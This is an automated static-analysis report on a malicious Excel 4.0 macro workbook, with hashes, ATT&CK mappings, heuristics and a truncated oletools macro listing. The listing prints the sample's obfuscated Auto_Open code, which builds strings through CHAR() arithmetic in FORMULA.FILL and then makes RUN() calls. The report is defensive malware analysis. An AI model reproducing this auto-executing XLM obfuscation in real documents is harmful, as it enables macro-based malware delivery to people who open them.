Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6b9aa7e441e4b089…

MALICIOUS

Office (OLE)

Size: 162.0 KB
Created: 2020-05-14 14:18:48
Authoring application: Microsoft Excel
First seen: 2020-07-24
MD5: 00c5e69ed4b9559cc349f01c54270d36
SHA-1: b85f89ced951837f1677d8183ff027d79d3e1605
SHA-256: 6b9aa7e441e4b089d461d1a6d0b3834fc487c2dc0ddb9afd6d65450034012f88
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The file is an Excel 4.0 macro-enabled workbook. Critical heuristics indicate the presence of an Auto_Open macro, which is a common technique for executing malicious code upon opening the document. The macro sheet contains a 'RUN' function call, suggesting it attempts to execute an external program or script. This is a strong indicator of a downloader or initial execution stage.

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 128875 bytes
SHA-256: 3a99d750ef9fd0acb1507d1895ab6dee5e3f39847f7d6d18af97398bebc0d807

Preview of the extracted script (first 1,000 lines):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!FL6191 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,EJ53,"",-59.10003906250000227374
'  Sheet,GG62,"",-1.88235294117647056211
'  Sheet,FT83,"",-17.87500000000000000000
'  Sheet,BA105,"",-207.00000000000000000000
'  Sheet,BK132,"",3.02083333333333348136
'  Sheet,JU146,"",26.10001953124999829470
'  Sheet,CU174,"",0.26397515527950315972
'  Sheet,EB176,"",8.75609756097560953947
'  Sheet,CQ228,"",-0.53043478260869569851
'  Sheet,BI233,"",146.00000000000000000000
'  Sheet,HW237,"",12.87500000000000000000
'  Sheet,J241,"",0.49440298507462687727
'  Sheet,GM284,"",-0.70329670329670335160
'  Sheet,IB351,"",0.28136293236964377007
'  Sheet,FZ354,"",-286.40000000000003410605
'  Sheet,EX416,"SET.VALUE(HD11006,-42.00000000000000000000-GET.CELL(17,CQ51777))",""
'  Sheet,EX417,RUN(GN59339),""
'  Sheet,DP511,"",1.08064516129032250902
'  Sheet,IW599,"",0.07181818181818182267
'  Sheet,JG646,"",0.47586206896551724865
'  Sheet,CL654,"",0.11142061281337047041
'  Sheet,IG658,"",138.00000000000000000000
'  Sheet,FA680,"",3.14285714285714279370
'  Sheet,GX730,"",396.00000000000000000000
'  Sheet,DZ779,"",-52.00000000000000000000
'  Sheet,IR912,"",474.00000000000000000000
'  Sheet,DJ914,"",1.11290322580645151263
'  Sheet,FB1007,"",37.00000000000000000000
'  Sheet,R1014,"",-141.00000000000000000000
'  Sheet,HJ1041,"",-63.87500000000000000000
'  Sheet,GV1088,"",0.83870967741935487094
'  Sheet,DT1139,"",-0.45217391304347825942
'  Sheet,EL1140,"FORMULA.FILL(CHAR(DS48365/DD34470)&CHAR(HD11006+JT25515)&CHAR(H24043-ES59058)&CHAR(BB20430/BZ61896)&CHAR(H24043+HT54376)&CHAR(HH49818*HB45437)&CHAR(BB20430+Z20494)&CHAR(HD11006*EU9018)&CHAR(H61+DS53913)&CHAR(GO32820*BE26991)&CHAR(HH49818-HF28911)&CHAR(H24043-BY60671)&CHAR(BL58941*HH49982)&CHAR(HD11006-FU34190)&CHAR(JF32736*GA47442)&CHAR(HD11006*HT49618)&CHAR(HH49818-J2060)&CHAR(DA30013/HK45263)&CHAR(JF32736*DV17047)&CHAR(H24043+FO60205)&CHAR(DA30013*EU5283)&CHAR(HH49818/EY11908)&CHAR(BL58941*IW64858)&CHAR(BB20430*JD58817)&CHAR(HD11006-HT39341)&CHAR(BB20430-EB52541)&CHAR(H24043/Q5533)&CHAR(BB20430*DT28754)&CHAR(H61/HJ49838)&CHAR(HD11006*GN43742)&CHAR(H24043-IH41597)&CHAR(JF32736/EI24343)&CHAR(H61/FI54386)&CHAR(JF32736+HN33601)&CHAR(H24043*BI48925)&CHAR(JF32736-X40896)&CHAR(HD11006/EM42001)&CHAR(HD11006*IE62789)&CHAR(BB20430+GH1459)&CHAR(JF32736+ED18438)&CHAR(GO32820-DE31852)&CHAR(DS48365+CP51108)&CHAR(H61-CG52412)&CHAR(HH49818+JN26902)&CHAR(H24043+FP49909)&CHAR(DS48365-GU46331)&CHAR(DS48365*BI63797),EL1141)",""
'  Sheet,EL1142,RUN(CE26066),""
'  Sheet,GL1189,"",-26.79999999999998294697
'  Sheet,CP1199,"",19.00000000000000000000
'  Sheet,FB1200,"",0.97426470588235292158
'  Sheet,FK1225,"",-49.00000000000000000000
'  Sheet,S1303,"",-13.79999999999998294697
'  Sheet,EV1304,"",-0.84905660377358493918
'  Sheet,JR1310,"",3.00000000000000000000
'  Sheet,DU1315,"",309.00000000000000000000
'  Sheet,IV1322,"",1.27419354838709675271
'  Sheet,JD1357,"",-0.35652173913043477826
'  Sheet,JJ1385,"",-265.75000000000000000000
'  Sheet,HS1388,"",2.22068965517241334595
'  Sheet,DZ1408,"",-284.00000000000000000000
'  Sheet,GH1459,"",208.00000000000000000000
'  Sheet,FL1465,"",-79.00000000000000000000
'  Sheet,FC1474,"",0.16732438831886345398
'  Sheet,EH1480,"",-1.45454545454545458583
'  Sheet,JJ1484,"",-9.31707317073170671051
'  Sheet,DJ1531,"",-0.27486910994764396365
'  Sheet,CI1545,"",311.00000000000000000000
'  Sheet,U1565,"",223.75000000000000000000
'  Sheet,DU1714,"",127.00000000000000000000
'  Sheet,HU1717,"",-58.00000000000000000000
'  Sheet,DZ1727,"",15.00000000000000000000
'  Sheet,DG1762,"",1.36363636363636353543
'  Sheet,I1821,"",0.36263736263736262577
'  Sheet,BS1829,"",-5.0000000000
... (truncated)